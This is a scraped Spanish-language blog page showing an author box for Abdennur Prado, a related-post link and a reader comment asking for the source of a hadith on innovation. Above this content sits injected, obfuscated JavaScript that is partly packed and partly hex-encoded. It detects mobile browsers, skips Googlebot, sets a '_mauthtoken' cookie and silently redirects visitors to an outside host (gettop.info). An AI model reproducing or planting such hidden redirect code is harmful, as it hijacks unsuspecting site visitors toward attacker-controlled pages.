g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))var _0xe879=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26″,”\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}

Acerca de Abdennur Prado

Imagen de perfil de Abdennur Prado

Ver también

Cerrados por destrucción

¡Ábrete, sésamo!   Es el sentimiento de quien escribe estas líneas que abundan mucho en …

Un comentario

  1. Imagen de perfil de estherp

    Hola, me ha interesado mucho el artículo y me gustaría que me indicaras donde puedo leer lo que indicas «Cuidado con las innovaciones, porque toda novedad es una innovación, y toda innovación es un extravío, y todo extravío lleva al Infierno», creo que es un hadiz de al bujari, pero me gustaría poder localizarlo y leerlo. Gracias

Deja un comentario